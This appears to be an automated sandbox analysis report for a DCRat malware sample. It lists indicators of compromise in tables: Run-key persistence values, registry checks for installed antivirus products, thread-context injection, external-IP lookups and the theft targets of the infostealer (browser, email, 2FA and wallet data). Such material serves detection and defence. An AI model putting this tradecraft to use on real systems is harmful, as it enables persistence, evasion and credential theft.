dcrat | cf1a8304da78b6286a412d33ef3e0390949eb83e5b08ad63c006ed578d5d4c95

System Information Discovery

Processes:

setups.tmpsetups.tmpFuwivodaepi.exeDozhepohyqo.exesetups.tmpclient32.exesetups.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	Fuwivodaepi.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	Dozhepohyqo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	client32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 64 IoCs

Processes:

LabPicV3.tmplylal220.tmprundll32.exerundll32.exesetups.tmptoolspab1.exeei111qo1fyj.tmpSetup3310.tmpvict.tmpvpn.tmpIBInstaller_97039.tmpnrl0jkg334t.exetoolspab1.exeloli.exeMsiExec.exeMsiExec.exemask_svc.exesetups.tmp90E8.exerundll32.exeRunWW.exe

pid	process
1292	LabPicV3.tmp
804	lylal220.tmp
4672	rundll32.exe
5112	rundll32.exe
4228	setups.tmp
4228	setups.tmp
4228	setups.tmp
4228	setups.tmp
4228	setups.tmp
4228	setups.tmp
4228	setups.tmp
5296	toolspab1.exe
5236	ei111qo1fyj.tmp
5512	Setup3310.tmp
5512	Setup3310.tmp
1720	vict.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
6200	IBInstaller_97039.tmp
1000	nrl0jkg334t.exe
6116	toolspab1.exe
6696	loli.exe
6696	loli.exe
2792	MsiExec.exe
2792	MsiExec.exe
2792	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
8104	MsiExec.exe
7728	mask_svc.exe
7728	mask_svc.exe
7728	mask_svc.exe
7728	mask_svc.exe
7728	mask_svc.exe
7728	mask_svc.exe
4628	setups.tmp
4628	setups.tmp
4628	setups.tmp
4628	setups.tmp
4628	setups.tmp
4628	setups.tmp
4628	setups.tmp
5704	vpn.tmp
5704	vpn.tmp
8004	90E8.exe
1052	rundll32.exe
508	RunWW.exe
508	RunWW.exe
8004	90E8.exe
8004	90E8.exe
8004	90E8.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exemultitimer.exemultitimer.exehjjgaa.exeppppppfy.exeMicrosoft.exemultitimer.exe20DD.tmp.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bsnuqekbzxd = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\UA7OJ5RCK1\\multitimer.exe\" 1 3.1617574046.606a389e5730c"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\elupfll5n5v = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6GMXAJKZY0\\multitimer.exe\" 1 3.1617574195.606a3933ba78a"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\xnblcnczfxs = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\GPT532NZPG\\multitimer.exe\" 1 3.1617574203.606a393bb086b"	multitimer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gaewemovaje.exe\""	ppppppfy.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Naebafewyvi.exe\""	Microsoft.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ljhbd1qbsku = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\X2NSOCC3B4\\multitimer.exe\" 1 3.1617574122.606a38eaa4b7a"	multitimer.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	20DD.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	20DD.tmp.exe

Checks for any installed AV software in registry 1 TTPs 64 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exemultitimer.exemultitimer.exemultitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

jg7_7wjg.exemd6_6ydj.exemd6_6ydj.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg7_7wjg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md6_6ydj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md6_6ydj.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

nrl0jkg334t.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\G:	nrl0jkg334t.exe
File opened (read-only)	\??\V:	nrl0jkg334t.exe
File opened (read-only)	\??\Z:	nrl0jkg334t.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	nrl0jkg334t.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	nrl0jkg334t.exe
File opened (read-only)	\??\Q:	nrl0jkg334t.exe
File opened (read-only)	\??\W:	nrl0jkg334t.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	nrl0jkg334t.exe
File opened (read-only)	\??\K:	nrl0jkg334t.exe
File opened (read-only)	\??\R:	nrl0jkg334t.exe
File opened (read-only)	\??\Y:	nrl0jkg334t.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\I:	nrl0jkg334t.exe
File opened (read-only)	\??\N:	nrl0jkg334t.exe
File opened (read-only)	\??\O:	nrl0jkg334t.exe
File opened (read-only)	\??\T:	nrl0jkg334t.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	nrl0jkg334t.exe
File opened (read-only)	\??\P:	nrl0jkg334t.exe
File opened (read-only)	\??\U:	nrl0jkg334t.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	nrl0jkg334t.exe
File opened (read-only)	\??\X:	nrl0jkg334t.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	nrl0jkg334t.exe
File opened (read-only)	\??\M:	nrl0jkg334t.exe
File opened (read-only)	\??\S:	nrl0jkg334t.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	nrl0jkg334t.exe
File opened (read-only)	\??\W:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

496 ipinfo.io
544 ipinfo.io
598 ip-api.com
13 ip-api.com
139 ipinfo.io
141 ipinfo.io
353 ipinfo.io
469 ipinfo.io

flow	ioc
496	ipinfo.io
544	ipinfo.io
598	ip-api.com
13	ip-api.com
139	ipinfo.io
141	ipinfo.io
353	ipinfo.io
469	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4424	508	WerFault.exe	RunWW.exe
5480	508	WerFault.exe	RunWW.exe
7988	508	WerFault.exe	RunWW.exe
7692	508	WerFault.exe	RunWW.exe
7596	508	WerFault.exe	RunWW.exe
2840	508	WerFault.exe	RunWW.exe
5720	508	WerFault.exe	RunWW.exe
4820	508	WerFault.exe	RunWW.exe
5888	508	WerFault.exe	RunWW.exe
8268	5336	WerFault.exe	MicrosoftEdgeCP.exe
8256	6752	WerFault.exe	win1host.exe
7924	2700	WerFault.exe	MicrosoftEdge.exe
5220	8448	WerFault.exe	MicrosoftEdgeCP.exe
6932	9732	WerFault.exe	MicrosoftEdgeCP.exe
6552	8544	WerFault.exe	MicrosoftEdgeCP.exe

Drops file in System32 directory 21 IoCs

Processes:

DrvInst.exesvchost.exeFull Program Features.exesvchost.exeDrvInst.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\GX4J1UB5.cookie	svchost.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B95.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2BA7.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	Full Program Features.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 94263B17B05E3BEC	svchost.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B96.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2BA7.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\GX4J1UB5.cookie	svchost.exe
File created	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B96.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\SET2B95.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{35c7e7fe-ee55-3349-b36b-3c66a0cf2502}\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

mask_svc.exemask_svc.exemask_svc.exe

pid process

1268 mask_svc.exe
2636 mask_svc.exe
7728 mask_svc.exe

pid	process
1268	mask_svc.exe
2636	mask_svc.exe
7728	mask_svc.exe

Suspicious use of SetThreadContext 14 IoCs

Processes:

svchost.exetoolspab1.exeloli.exetoolspab1.exe1.exe2.exelilalmix.exe20DD.tmp.exeE36F.exe1.exe2.exe

description	pid	process	target process
PID 3632 set thread context of 4780	3632	svchost.exe	svchost.exe
PID 6132 set thread context of 5296	6132	toolspab1.exe	toolspab1.exe
PID 740 set thread context of 6696	740	loli.exe	loli.exe
PID 6348 set thread context of 6116	6348	toolspab1.exe	toolspab1.exe
PID 7524 set thread context of 7464	7524	1.exe	1.exe
PID 7836 set thread context of 5068	7836	2.exe	2.exe
PID 2648 set thread context of 5796	2648	lilalmix.exe	lilalmix.exe
PID 4100 set thread context of 7720	4100	20DD.tmp.exe	msiexec.exe
PID 4100 set thread context of 7184	4100	20DD.tmp.exe	msiexec.exe
PID 5328 set thread context of 8920	5328	E36F.exe	E36F.exe
PID 5396 set thread context of 8784	5396	1.exe	1.exe
PID 4728 set thread context of 6628	4728	2.exe	2.exe
PID 4100 set thread context of 6672	4100	20DD.tmp.exe	msiexec.exe
PID 4100 set thread context of 8628	4100	20DD.tmp.exe	Conhost.exe

Drops file in Program Files directory 64 IoCs

Processes:

prolab.tmpjg7_7wjg.exesetup_10.2_mix.exeguihuali-game.exeirecord.tmpIBInstaller_97039.tmpvpn.tmpMicrosoft.exevict.tmpSetup.exe29DEA0BA258723098A514297F4C4D0B7.exeei111qo1fyj.tmpvict.tmpsetup_10.2_mix.exeSetup.exeppppppfy.exe

description	ioc	process
File created	C:\Program Files (x86)\Picture Lab\is-22E4G.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.jfm	jg7_7wjg.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_pressed.png	setup_10.2_mix.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_hover.png	setup_10.2_mix.exe
File created	C:\Program Files\unins.vbs	guihuali-game.exe
File created	C:\Program Files\unins0000.dat	guihuali-game.exe
File opened for modification	C:\Program Files (x86)\I-record\Bunifu_UI_v1.52.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\networkinspection.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-QV88O.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\Reference Assemblies\Naebafewyvi.exe.config	Microsoft.exe
File created	C:\Program Files (x86)\viewerise\is-GMMFM.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\Advanced Trip\DreamTrip.exe	setup_10.2_mix.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\Gadget.Xml	setup_10.2_mix.exe
File created	C:\Program Files (x86)\I-record\is-0P1HV.tmp	irecord.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JM5E9.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Math.dll	prolab.tmp
File created	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d	jg7_7wjg.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-N5SFO.tmp	prolab.tmp
File created	C:\Program Files (x86)\I-record\is-L1H1P.tmp	irecord.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JKEVV.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-01L43.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceLibrary.dll	prolab.tmp
File created	C:\Program Files (x86)\I-record\is-3OHBA.tmp	irecord.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JGU5K.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-D318Q.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-VV7Q4.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe	Setup.exe
File created	C:\Program Files (x86)\Install engine 16\is-NQTJB.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Uninstall.exe	29DEA0BA258723098A514297F4C4D0B7.exe
File opened for modification	C:\Program Files (x86)\I-record\avdevice-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.INTEG.RAW	jg7_7wjg.exe
File created	C:\Program Files (x86)\viewerise\is-P5QOE.tmp	ei111qo1fyj.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	ei111qo1fyj.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe	29DEA0BA258723098A514297F4C4D0B7.exe
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\viewerise\is-AJ9E6.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\unins000.dat	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_normal.png	setup_10.2_mix.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe	29DEA0BA258723098A514297F4C4D0B7.exe
File created	C:\Program Files (x86)\MaskVPN\unins000.msg	vpn.tmp
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_hover.png	setup_10.2_mix.exe
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Install engine 16\Swap.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JGDDL.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-FLUPE.tmp	vpn.tmp
File created	C:\Program Files (x86)\Google\Gaewemovaje.exe.config	ppppppfy.exe
File opened for modification	C:\Program Files (x86)\I-record\postproc-52.dll	irecord.tmp
File created	C:\Program Files (x86)\I-record\is-BE4EO.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\PPMd.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Picture Lab\is-2EURL.tmp	prolab.tmp
File created	C:\Program Files (x86)\Reference Assemblies\Naebafewyvi.exe	Microsoft.exe
File opened for modification	C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe	ei111qo1fyj.tmp
File opened for modification	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe	29DEA0BA258723098A514297F4C4D0B7.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_normal.png	setup_10.2_mix.exe
File created	C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Uninstall.ini	29DEA0BA258723098A514297F4C4D0B7.exe
File opened for modification	C:\Program Files (x86)\I-record\unins000.dat	irecord.tmp
